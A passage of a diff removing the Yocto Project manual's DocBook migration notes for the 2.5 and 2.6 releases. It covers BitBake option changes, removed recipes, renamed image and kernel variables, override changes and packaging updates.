- <emphasis><filename>scripts/test-dependencies.sh</filename> script:</emphasis>
- The script is largely made obsolete by the
- recipe-specific sysroots functionality introduced in the
- previous release.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.5-bitbake-changes'>
- <title>BitBake Changes</title>
-
- <para>
- The following are BitBake changes:
- <itemizedlist>
- <listitem><para>
- The <filename>--runall</filename> option has changed.
- There are two different behaviors people might want:
- <itemizedlist>
- <listitem><para>
- <emphasis>Behavior A:</emphasis>
- For a given target (or set of targets) look through
- the task graph and run task X only if it is present
- and will be built.
- </para></listitem>
- <listitem><para>
- <emphasis>Behavior B:</emphasis>
- For a given target (or set of targets) look through
- the task graph and run task X if any recipe in the
- taskgraph has such a target, even if it is not in
- the original task graph.
- </para></listitem>
- </itemizedlist>
- The <filename>--runall</filename> option now performs
- "Behavior B".
- Previously <filename>--runall</filename> behaved like
- "Behavior A".
- A <filename>--runonly</filename> option has been added to
- retain the ability to perform "Behavior A".
- </para></listitem>
- <listitem><para>
- Several explicit "run this task for all recipes in the
- dependency tree" tasks have been removed (e.g.
- <filename>fetchall</filename>,
- <filename>checkuriall</filename>, and the
- <filename>*all</filename> tasks provided by the
- <filename>distrodata</filename> and
- <filename>archiver</filename> classes).
- There is a BitBake option to complete this for any arbitrary
- task. For example:
- <literallayout class='monospaced'>
- bitbake &lt;target&gt; -c fetchall
- </literallayout>
- should now be replaced with:
- <literallayout class='monospaced'>
- bitbake &lt;target&gt; --runall=fetch
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.5-python-and-python3-changes'>
- <title>Python and Python 3 Changes</title>
-
- <para>
- The following are auto-packaging changes to Python and Python 3:
- </para>
- <para>
- The script-managed <filename>python-*-manifest.inc</filename> files
- that were previously used to generate Python and Python 3
- packages have been replaced with a JSON-based file that is
- easier to read and maintain.
- A new task is available for maintainers of the Python recipes to
- update the JSON file when upgrading to new Python versions.
- You can now edit the file directly instead of having to edit a
- script and run it to update the file.
- </para>
- <para>
- One particular change to note is that the Python recipes no longer
- have build-time provides for their packages.
- This assumes <filename>python-foo</filename> is one of the packages
- provided by the Python recipe.
- You can no longer run <filename>bitbake python-foo</filename> or
- have a <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink> on
- <filename>python-foo</filename>, but doing either of the following
- causes the package to work as expected:
- <literallayout class='monospaced'>
- IMAGE_INSTALL_append = " python-foo"
- </literallayout>
- or
- <literallayout class='monospaced'>
- RDEPENDS_${PN} = "python-foo"
- </literallayout>
- The earlier build-time provides behavior was a quirk of the way the
- Python manifest file was created.
- For more information on this change please see
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=8d94b9db221d1def42f091b991903faa2d1651ce'>this commit</ulink>.
- </para>
- </section>
-
- <section id='migration-2.5-miscellaneous-changes'>
- <title>Miscellaneous Changes</title>
-
- <para>
- The following are additional changes:
- <itemizedlist>
- <listitem><para>
- The <filename>kernel</filename> class supports building
- packages for multiple kernels.
- If your kernel recipe or <filename>.bbappend</filename> file
- mentions packaging at all, you should replace references to
- the kernel in package names with
- <filename>${KERNEL_PACKAGE_NAME}</filename>.
- For example, if you disable automatic installation of the
- kernel image using
- <filename>RDEPENDS_kernel-base = ""</filename> you can avoid
- warnings using
- <filename>RDEPENDS_${KERNEL_PACKAGE_NAME}-base = ""</filename>
- instead.
- </para></listitem>
- <listitem><para>
- The <filename>buildhistory</filename> class commits changes
- to the repository by default so you no longer need to set
- <filename>BUILDHISTORY_COMMIT = "1"</filename>.
- If you want to disable commits you need to set
- <filename>BUILDHISTORY_COMMIT = "0"</filename> in your
- configuration.
- </para></listitem>
- <listitem><para>
- The <filename>beaglebone</filename> reference machine has
- been renamed to <filename>beaglebone-yocto</filename>.
- The <filename>beaglebone-yocto</filename> BSP is a reference
- implementation using only mainline components available in
- OpenEmbedded-Core and <filename>meta-yocto-bsp</filename>,
- whereas Texas Instruments maintains a full-featured BSP in
- the <filename>meta-ti</filename> layer.
- This rename avoids the previous name clash that existed
- between the two BSPs.
- </para></listitem>
- <listitem><para>
- The <filename>update-alternatives</filename> class no longer
- works with SysV <filename>init</filename> scripts because
- this usage has been problematic.
- Also, the <filename>sysklogd</filename> recipe no longer
- uses <filename>update-alternatives</filename> because it is
- incompatible with other implementations.
- </para></listitem>
- <listitem><para>
- By default, the
- <link linkend='ref-classes-cmake'><filename>cmake</filename></link>
- class uses <filename>ninja</filename> instead of
- <filename>make</filename> for building.
- This improves build performance.
- If a recipe is broken with <filename>ninja</filename>, then
- the recipe can set
- <filename>OECMAKE_GENERATOR = "Unix Makefiles"</filename>
- to change back to <filename>make</filename>.
- </para></listitem>
- <listitem><para>
- The previously deprecated <filename>base_*</filename>
- functions have been removed in favor of their replacements
- in <filename>meta/lib/oe</filename> and
- <filename>bitbake/lib/bb</filename>.
- These are typically used from recipes and classes.
- Any references to the old functions must be updated.
- The following table shows the removed functions and their
- replacements:
-
- <literallayout class='monospaced'>
- <emphasis>Removed</emphasis> <emphasis>Replacement</emphasis>
- ============================ ============================
- base_path_join() oe.path.join()
- base_path_relative() oe.path.relative()
- base_path_out() oe.path.format_display()
- base_read_file() oe.utils.read_file()
- base_ifelse() oe.utils.ifelse()
- base_conditional() oe.utils.conditional()
- base_less_or_equal() oe.utils.less_or_equal()
- base_version_less_or_equal() oe.utils.version_less_or_equal()
- base_contains() bb.utils.contains()
- base_both_contain() oe.utils.both_contain()
- base_prune_suffix() oe.utils.prune_suffix()
- oe_filter() oe.utils.str_filter()
- oe_filter_out() oe.utils.str_filter_out() (or use the _remove operator).
- </literallayout>
- </para></listitem>
- <listitem><para>
- Using <filename>exit 1</filename> to explicitly defer a
- postinstall script until first boot is now deprecated since
- it is not an obvious mechanism and can mask actual errors.
- If you want to explicitly defer a postinstall to first boot
- on the target rather than at <filename>rootfs</filename>
- creation time, use
- <filename>pkg_postinst_ontarget()</filename>
- or call
- <filename>postinst_intercept delay_to_first_boot</filename>
- from <filename>pkg_postinst()</filename>.
- Any failure of a <filename>pkg_postinst()</filename>
- script (including <filename>exit 1</filename>)
- will trigger a warning during
- <filename>do_rootfs</filename>.</para>
-
- <para>For more information, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-post-installation-scripts'>Post-Installation Scripts</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para>
- The <filename>elf</filename> image type has been removed.
- This image type was removed because the
- <filename>mkelfimage</filename> tool
- that was required to create it is no longer provided by
- coreboot upstream and required updating every time
- <filename>binutils</filename> updated.
- </para></listitem>
- <listitem><para>
- Support for .iso image compression (previously enabled
- through <filename>COMPRESSISO = "1"</filename>) has been
- removed.
- The userspace tools (<filename>zisofs-tools</filename>) are
- unmaintained and <filename>squashfs</filename> provides
- better performance and compression.
- In order to build a live image with squashfs+lz4 compression
- enabled you should now set
- <filename>LIVE_ROOTFS_TYPE = "squashfs-lz4"</filename>
- and ensure that <filename>live</filename>
- is in <filename>IMAGE_FSTYPES</filename>.
- </para></listitem>
- <listitem><para>
- Recipes with an unconditional dependency on
- <filename>libpam</filename> are only buildable with
- <filename>pam</filename> in
- <filename>DISTRO_FEATURES</filename>.
- If the dependency is truly optional then it is recommended
- that the dependency be conditional upon
- <filename>pam</filename> being in
- <filename>DISTRO_FEATURES</filename>.
- </para></listitem>
- <listitem><para>
- For EFI-based machines, the bootloader
- (<filename>grub-efi</filename> by default) is installed into
- the image at /boot.
- Wic can be used to split the bootloader into separate boot
- and rootfs partitions if necessary.
- </para></listitem>
- <listitem><para>
- Patches whose context does not match exactly (i.e. where
- patch reports "fuzz" when applying) will generate a
- warning.
- For an example of this see
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=cc97bc08125b63821ce3f616771830f77c456f57'>this commit</ulink>.
- </para></listitem>
- <listitem><para>
- Layers are expected to set
- <filename>LAYERSERIES_COMPAT_layername</filename>
- to match the version(s) of OpenEmbedded-Core they are
- compatible with.
- This is specified as codenames using spaces to separate
- multiple values (e.g. "rocko sumo").
- If a layer does not set
- <filename>LAYERSERIES_COMPAT_layername</filename>, a warning
- will is shown.
- If a layer sets a value that does not include the current
- version ("sumo" for the 2.5 release), then an error will be
- produced.
- </para></listitem>
- <listitem><para>
- The <filename>TZ</filename> environment variable is set to
- "UTC" within the build environment in order to fix
- reproducibility problems in some recipes.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.6-release'>
- <title>Moving to the Yocto Project 2.6 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 2.6 Release from the prior release.
- </para>
-
- <section id='migration-2.6-gcc-changes'>
- <title>GCC 8.2 is Now Used by Default</title>
-
- <para>
- The GNU Compiler Collection version 8.2 is now used by default
- for compilation.
- For more information on what has changed in the GCC 8.x release,
- see
- <ulink url='https://gcc.gnu.org/gcc-8/changes.html'></ulink>.
- </para>
-
- <para>
- If you still need to compile with version 7.x, GCC 7.3 is
- also provided.
- You can select this version by setting the
- and can be selected by setting the
- <link linkend='var-GCCVERSION'><filename>GCCVERSION</filename></link>
- variable to "7.%" in your configuration.
- </para>
- </section>
-
- <section id='migration-2.6-removed-recipes'>
- <title>Removed Recipes</title>
-
- <para>
- The following recipes have been removed:
- <literallayout class='monospaced'>
- <emphasis><filename>beecrypt</filename>:</emphasis> No longer needed since moving to RPM 4.
- <emphasis><filename>bigreqsproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>calibrateproto</filename>:</emphasis> Removed in favor of <filename>xinput</filename>.
- <emphasis><filename>compositeproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>damageproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>dmxproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>dri2proto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>dri3proto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>eee-acpi-scripts</filename>:</emphasis> Became obsolete.
- <emphasis><filename>fixesproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>fontsproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>fstests</filename>:</emphasis> Became obsolete.
- <emphasis><filename>gccmakedep</filename>:</emphasis> No longer used.
- <emphasis><filename>glproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>gnome-desktop3</filename>:</emphasis> No longer needed. This recipe has moved to <filename>meta-oe</filename>.
- <emphasis><filename>icon-naming-utils</filename>:</emphasis> No longer used since the Sato theme was removed in 2016.
- <emphasis><filename>inputproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>kbproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>libusb-compat</filename>:</emphasis> Became obsolete.
- <emphasis><filename>libuser</filename>:</emphasis> Became obsolete.
- <emphasis><filename>libnfsidmap</filename>:</emphasis> No longer an external requirement since <filename>nfs-utils</filename> 2.2.1. <filename>libnfsidmap</filename> is now integrated.
- <emphasis><filename>libxcalibrate</filename>:</emphasis> No longer needed with <filename>xinput</filename>
- <emphasis><filename>mktemp</filename>:</emphasis> Became obsolete. The <filename>mktemp</filename> command is provided by both <filename>busybox</filename> and <filename>coreutils</filename>.
- <emphasis><filename>ossp-uuid</filename>:</emphasis> Is not being maintained and has mostly been replaced by <filename>uuid.h</filename> in <filename>util-linux</filename>.
- <emphasis><filename>pax-utils</filename>:</emphasis> No longer needed. Previous QA tests that did use this recipe are now done at build time.
- <emphasis><filename>pcmciautils</filename>:</emphasis> Became obsolete.
- <emphasis><filename>pixz</filename>:</emphasis> No longer needed. <filename>xz</filename> now supports multi-threaded compression.
- <emphasis><filename>presentproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>randrproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>recordproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>renderproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>resourceproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>scrnsaverproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>trace-cmd</filename>:</emphasis> Became obsolete. <filename>perf</filename> replaced this recipe's functionally.
- <emphasis><filename>videoproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>wireless-tools</filename>:</emphasis> Became obsolete. Superseded by <filename>iw</filename>.
- <emphasis><filename>xcmiscproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>xextproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>xf86dgaproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>xf86driproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>xf86miscproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>xf86-video-omapfb</filename>:</emphasis> Became obsolete. Use kernel modesetting driver instead.
- <emphasis><filename>xf86-video-omap</filename>:</emphasis> Became obsolete. Use kernel modesetting driver instead.
- <emphasis><filename>xf86vidmodeproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>xineramaproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>xproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
- <emphasis><filename>yasm</filename>:</emphasis> No longer needed since previous usages are now satisfied by <filename>nasm</filename>.
- </literallayout>
- </para>
- </section>
-
- <section id='migration-2.6-packaging-changes'>
- <title>Packaging Changes</title>
-
- <para>
- The following packaging changes have been made:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>cmake</filename>:</emphasis>
- <filename>cmake.m4</filename> and
- <filename>toolchain</filename> files have been moved to the
- main package.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>iptables</filename>:</emphasis>
- The <filename>iptables</filename> modules have been split
- into separate packages.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>alsa-lib</filename>:</emphasis>
- <filename>libasound</filename> is now in the main
- <filename>alsa-lib</filename> package instead of
- <filename>libasound</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>glibc</filename>:</emphasis>
- <filename>libnss-db</filename> is now in its own package
- along with a <filename>/var/db/makedbs.sh</filename>
- script to update databases.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python</filename> and <filename>python3</filename>:</emphasis>
- The main package has been removed from the recipe.
- You must install specific packages or
- <filename>python-modules</filename> /
- <filename>python3-modules</filename> for everything.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>systemtap</filename>:</emphasis>
- Moved <filename>systemtap-exporter</filename> into its own
- package.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.6-xorg-protocol-dependencies'>
- <title>XOrg Protocol dependencies</title>
-
- <para>
- The "*proto" upstream repositories have been combined into one
- "xorgproto" repository.
- Thus, the corresponding recipes have also been combined into a
- single <filename>xorgproto</filename> recipe.
- Any recipes that depend upon the older <filename>*proto</filename>
- recipes need to be changed to depend on the newer
- <filename>xorgproto</filename> recipe instead.
- </para>
-
- <para>
- For names of recipes removed because of this repository change,
- see the
- <link linkend="migration-2.6-removed-recipes">Removed Recipes</link>
- section.
- </para>
- </section>
-
- <section id='migration-2.6-distutils-distutils3-fetching-dependencies'>
- <title><filename>distutils</filename> and <filename>distutils3</filename> Now Prevent Fetching Dependencies During the <filename>do_configure</filename> Task</title>
-
- <para>
- Previously, it was possible for Python recipes that inherited
- the
- <link linkend='ref-classes-distutils'><filename>distutils</filename></link>
- and
- <link linkend='ref-classes-distutils3'><filename>distutils3</filename></link>
- classes to fetch code during the
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- task to satisfy dependencies mentioned in
- <filename>setup.py</filename> if those dependencies were not
- provided in the sysroot (i.e. recipes providing the dependencies
- were missing from
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>).
- <note>
- This change affects classes beyond just the two mentioned
- (i.e. <filename>distutils</filename> and
- <filename>distutils3</filename>).
- Any recipe that inherits <filename>distutils*</filename>
- classes are affected.
- For example, the <filename>setuptools</filename> and
- <filename>setuptools3</filename> recipes are affected since
- they inherit the <filename>distutils*</filename> classes.
- </note>
- </para>
-
- <para>
- Fetching these types of dependencies that are not provided in the
- sysroot negatively affects the ability to reproduce builds.
- This type of fetching is now explicitly disabled.
- Consequently, any missing dependencies in Python recipes that
- use these classes now result in an error during the
- <filename>do_configure</filename> task.
- </para>
- </section>
-
- <section id='migration-2.6-linux-yocto-configuration-audit-issues-now-correctly-reported'>
- <title><filename>linux-yocto</filename> Configuration Audit Issues Now Correctly Reported</title>
-
- <para>
- Due to a bug, the kernel configuration audit functionality was
- not writing out any resulting warnings during the build.
- This issue is now corrected.
- You might notice these warnings now if you have a custom kernel
- configuration with a <filename>linux-yocto</filename> style
- kernel recipe.
- </para>
- </section>
-
- <section id='migration-2.6-image-kernel-artifact-naming-changes'>
- <title>Image/Kernel Artifact Naming Changes</title>
-
- <para>
- The following changes have been made:
- <itemizedlist>
- <listitem><para>
- Name variables (e.g.
- <link linkend='var-IMAGE_NAME'><filename>IMAGE_NAME</filename></link>)
- use a new <filename>IMAGE_VERSION_SUFFIX</filename>
- variable instead of
- <link linkend='var-DATETIME'><filename>DATETIME</filename></link>.
- Using <filename>IMAGE_VERSION_SUFFIX</filename> allows
- easier and more direct changes.</para>
-
- <para>The <filename>IMAGE_VERSION_SUFFIX</filename>
- variable is set in the
- <filename>bitbake.conf</filename> configuration file as
- follows:
- <literallayout class='monospaced'>
- IMAGE_VERSION_SUFFIX = "-${DATETIME}"
- </literallayout>
- </para></listitem>
- <listitem><para>
- Several variables have changed names for consistency:
- <literallayout class='monospaced'>
- Old Variable Name New Variable Name
- ========================================================
- KERNEL_IMAGE_BASE_NAME <link linkend='var-KERNEL_IMAGE_NAME'>KERNEL_IMAGE_NAME</link>
- KERNEL_IMAGE_SYMLINK_NAME <link linkend='var-KERNEL_IMAGE_LINK_NAME'>KERNEL_IMAGE_LINK_NAME</link>
- MODULE_TARBALL_BASE_NAME <link linkend='var-MODULE_TARBALL_NAME'>MODULE_TARBALL_NAME</link>
- MODULE_TARBALL_SYMLINK_NAME <link linkend='var-MODULE_TARBALL_LINK_NAME'>MODULE_TARBALL_LINK_NAME</link>
- INITRAMFS_BASE_NAME <link linkend='var-INITRAMFS_NAME'>INITRAMFS_NAME</link>
- </literallayout>
- </para></listitem>
- <listitem><para>
- The <filename>MODULE_IMAGE_BASE_NAME</filename> variable
- has been removed.
- The module tarball name is now controlled directly with the
- <link linkend='var-MODULE_TARBALL_NAME'><filename>MODULE_TARBALL_NAME</filename></link>
- variable.
- </para></listitem>
- <listitem><para>
- The
- <link linkend='var-KERNEL_DTB_NAME'><filename>KERNEL_DTB_NAME</filename></link>
- and
- <link linkend='var-KERNEL_DTB_LINK_NAME'><filename>KERNEL_DTB_LINK_NAME</filename></link>
- variables have been introduced to control kernel Device
- Tree Binary (DTB) artifact names instead of mangling
- <filename>KERNEL_IMAGE_*</filename> variables.
- </para></listitem>
- <listitem><para>
- The
- <link linkend='var-KERNEL_FIT_NAME'><filename>KERNEL_FIT_NAME</filename></link>
- and
- <link linkend='var-KERNEL_FIT_LINK_NAME'><filename>KERNEL_FIT_LINK_NAME</filename></link>
- variables have been introduced to specify the name of
- flattened image tree (FIT) kernel images similar to other
- deployed artifacts.
- </para></listitem>
- <listitem><para>
- The
- <link linkend='var-MODULE_TARBALL_NAME'><filename>MODULE_TARBALL_NAME</filename></link>
- and
- <link linkend='var-MODULE_TARBALL_LINK_NAME'><filename>MODULE_TARBALL_LINK_NAME</filename></link>
- variable values no longer include the "module-" prefix or
- ".tgz" suffix.
- These parts are now hardcoded so that the values are
- consistent with other artifact naming variables.
- </para></listitem>
- <listitem><para>
- Added the
- <link linkend='var-INITRAMFS_LINK_NAME'><filename>INITRAMFS_LINK_NAME</filename></link>
- variable so that the symlink can be controlled similarly
- to other artifact types.
- </para></listitem>
- <listitem><para>
- <link linkend='var-INITRAMFS_NAME'><filename>INITRAMFS_NAME</filename></link>
- now uses
- "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
- instead of
- "${PV}-${PR}-${MACHINE}-${DATETIME}", which
- makes it consistent with other variables.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.6-serial-console-deprecated'>
- <title><filename>SERIAL_CONSOLE</filename> Deprecated</title>
-
- <para>
- The
- <link linkend='var-SERIAL_CONSOLE'><filename>SERIAL_CONSOLE</filename></link>
- variable has been functionally replaced by the
- <link linkend='var-SERIAL_CONSOLES'><filename>SERIAL_CONSOLES</filename></link>
- variable for some time.
- With the Yocto Project 2.6 release,
- <filename>SERIAL_CONSOLE</filename> has been officially deprecated.
- </para>
-
- <para>
- <filename>SERIAL_CONSOLE</filename> will continue to work as
- before for the 2.6 release.
- However, for the sake of future compatibility, it is recommended
- that you replace all instances of
- <filename>SERIAL_CONSOLE</filename> with
- <filename>SERIAL_CONSOLES</filename>.
- <note>
- The only difference in usage is that
- <filename>SERIAL_CONSOLES</filename> expects entries to be
- separated using semicolons as compared to
- <filename>SERIAL_CONSOLE</filename>, which expects spaces.
- </note>
- </para>
- </section>
-
- <section id='migration-2.6-poky-sets-unknown-configure-option-to-qa-error'>
- <title>Configure Script Reports Unknown Options as Errors</title>
-
- <para>
- If the configure script reports an unknown option, this now
- triggers a QA error instead of a warning.
- Any recipes that previously got away with specifying such unknown
- options now need to be fixed.
- </para>
- </section>
-
- <section id='migration-2.6-override-changes'>
- <title>Override Changes</title>
-
- <para>
- The following changes have occurred:
- <itemizedlist>
- <listitem><para>
- <emphasis>The <filename>virtclass-native</filename> and
- <filename>virtclass-nativesdk</filename> Overrides Have
- Been Removed:</emphasis>
- The <filename>virtclass-native</filename> and
- <filename>virtclass-nativesdk</filename> overrides have
- been deprecated since 2012 in favor of
- <filename>class-native</filename> and
- <filename>class-nativesdk</filename>, respectively.
- Both <filename>virtclass-native</filename> and
- <filename>virtclass-nativesdk</filename> are now dropped.
- <note>
- The <filename>virtclass-multilib-</filename> overrides
- for multilib are still valid.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>The <filename>forcevariable</filename>
- Override Now Has a Higher Priority Than
- <filename>libc</filename> Overrides:</emphasis>
- The <filename>forcevariable</filename> override is
- documented to be the highest priority override.
- However, due to a long-standing quirk of how
- <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>
- is set, the <filename>libc</filename> overrides (e.g.
- <filename>libc-glibc</filename>,
- <filename>libc-musl</filename>, and so forth) erroneously
- had a higher priority.
- This issue is now corrected.</para>
-
- <para>It is likely this change will not cause any
- problems.
- However, it is possible with some unusual configurations
- that you might see a change in behavior if you were
- relying on the previous behavior.
- Be sure to check how you use
- <filename>forcevariable</filename> and
- <filename>libc-*</filename> overrides in your custom
- layers and configuration files to ensure they make sense.
- </para></listitem>
- <listitem><para>
- <emphasis>The <filename>build-${BUILD_OS}</filename>
- Override Has Been Removed:</emphasis>
- The <filename>build-${BUILD_OS}</filename>, which is
- typically <filename>build-linux</filename>, override has
- been removed because building on a host operating system
- other than a recent version of Linux is neither supported
- nor recommended.
- Dropping the override avoids giving the impression that
- other host operating systems might be supported.
- </para></listitem>
- <listitem><para>
- The "_remove" operator now preserves whitespace.
- Consequently, when specifying list items to remove, be
- aware that leading and trailing whitespace resulting from
- the removal is retained.</para>
-
- <para>See the
- "<ulink url='&YOCTO_DOCS_BB_URL;#removing-override-style-syntax'>Removal (Override Style Syntax)</ulink>"
- section in the BitBake User Manual for a detailed example.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.6-systemd-configuration-now-split-out-to-system-conf'>
- <title><filename>systemd</filename> Configuration is Now Split Into <filename>systemd-conf</filename></title>
-
- <para>
- The configuration for the <filename>systemd</filename> recipe
- has been moved into a <filename>system-conf</filename> recipe.
- Moving this configuration to a separate recipe avoids the
- <filename>systemd</filename> recipe from becoming machine-specific
- for cases where machine-specific configurations need to be applied
- (e.g. for <filename>qemu*</filename> machines).
- </para>
-
- <para>
- Currently, the new recipe packages the following files:
- <literallayout class='monospaced'>
- ${sysconfdir}/machine-id
- ${sysconfdir}/systemd/coredump.conf
- ${sysconfdir}/systemd/journald.conf
- ${sysconfdir}/systemd/logind.conf
- ${sysconfdir}/systemd/system.conf
- ${sysconfdir}/systemd/user.conf
- </literallayout>
- If you previously used bbappend files to append the
- <filename>systemd</filename> recipe to change any of the
- listed files, you must do so for the
- <filename>systemd-conf</filename> recipe instead.
- </para>
- </section>
-
- <section id='migration-2.6-automatic-testing-changes'>
- <title>Automatic Testing Changes</title>
-
- <para>
- This section provides information about automatic testing
- changes:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>TEST_IMAGE</filename> Variable Removed:</emphasis>
- Prior to this release, you set the
- <filename>TEST_IMAGE</filename> variable to "1" to
- enable automatic testing for successfully built images.
- The <filename>TEST_IMAGE</filename> variable no longer
- exists and has been replaced by the
- <link linkend='var-TESTIMAGE_AUTO'><filename>TESTIMAGE_AUTO</filename></link>
- variable.
- </para></listitem>
- <listitem><para>
- <emphasis>Inheriting the <filename>testimage</filename> and
- <filename>testsdk</filename> Classes:</emphasis>
- Best practices now dictate that you use the
- <link linkend='var-IMAGE_CLASSES'><filename>IMAGE_CLASSES</filename></link>
- variable rather than the
- <link linkend='var-INHERIT'><filename>INHERIT</filename></link>
- variable when you inherit the
- <link linkend='ref-classes-testimage*'><filename>testimage</filename></link>
- and
- <link linkend='ref-classes-testsdk'><filename>testsdk</filename></link>
- classes used for automatic testing.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.6-openssl-changes'>
- <title>OpenSSL Changes</title>
-
- <para>
- <ulink url='https://www.openssl.org/'>OpenSSL</ulink> has been
- upgraded from 1.0 to 1.1.
- By default, this upgrade could cause problems for recipes that
- have both versions in their dependency chains.
- The problem is that both versions cannot be installed together
- at build time.
- <note>
- It is possible to have both versions of the library at runtime.
- </note>
- </para>
- </section>
-
- <section id='migration-2.6-bitbake-changes'>
- <title>BitBake Changes</title>
-
- <para>
- The server logfile <filename>bitbake-cookerdaemon.log</filename> is
- now always placed in the
- <link linkend='build-directory'>Build Directory</link>
- instead of the current directory.
- </para>
- </section>
-
- <section id='migration-2.6-security-changes'>
- <title>Security Changes</title>
-
- <para>
- The Poky distribution now uses security compiler flags by
- default.
- Inclusion of these flags could cause new failures due to stricter
- checking for various potential security issues in code.
- </para>
- </section>
-
- <section id='migration-2.6-post-installation-changes'>
- <title>Post Installation Changes</title>
-
- <para>
- You must explicitly mark post installs to defer to the target.
- If you want to explicitly defer a postinstall to first boot on
- the target rather than at rootfs creation time, use
- <filename>pkg_postinst_ontarget()</filename> or call
- <filename>postinst_intercept delay_to_first_boot</filename> from
- <filename>pkg_postinst()</filename>.
- Any failure of a <filename>pkg_postinst()</filename> script
- (including exit 1) triggers an error during the
- <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link> task.
- </para>
-
- <para>
- For more information on post-installation behavior, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-post-installation-scripts'>Post-Installation Scripts</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='migration-2.6-python-3-profile-guided-optimizations'>
- <title>Python 3 Profile-Guided Optimization</title>
-
- <para>
- The <filename>python3</filename> recipe now enables profile-guided
- optimization.
- Using this optimization requires a little extra build time in
- exchange for improved performance on the target at runtime.
- Additionally, the optimization is only enabled if the current
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- has support for user-mode emulation in QEMU (i.e. "qemu-usermode"
- is in
- <link linkend='var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></link>,
- which it is by default).
- </para>
-
- <para>
- If you wish to disable Python profile-guided optimization
- regardless of the value of
- <filename>MACHINE_FEATURES</filename>, then ensure that
- <link linkend='var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></link>
- for the <filename>python3</filename> recipe does not contain "pgo".
- You could accomplish the latter using the following at the
- configuration level:
- <literallayout class='monospaced'>
- PACKAGECONFIG_remove_pn-python3 = "pgo"
- </literallayout>
- Alternatively, you can set
- <filename>PACKAGECONFIG</filename> using an append file for the
- <filename>python3</filename> recipe.
- </para>
- </section>
-
- <section id='migration-2.6-miscellaneous-changes'>
- <title>Miscellaneous Changes</title>
-
- <para>
- The following miscellaneous changes occurred:
- <itemizedlist>
- <listitem><para>
- Default to using the Thumb-2 instruction set for armv7a
- and above.
- If you have any custom recipes that build software that
- needs to be built with the ARM instruction set, change the
- recipe to set the instruction set as follows:
- <literallayout class='monospaced'>
- ARM_INSTRUCTION_SET = "arm"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <filename>run-postinsts</filename> no longer uses
- <filename>/etc/*-postinsts</filename> for
- <filename>dpkg/opkg</filename> in favor of built-in
- postinst support.
- RPM behavior remains unchanged.
- </para></listitem>
- <listitem><para>
- The <filename>NOISO</filename> and
- <filename>NOHDD</filename> variables are no longer used.
- You now control building <filename>*.iso</filename> and
- <filename>*.hddimg</filename> image types directly
- by using the
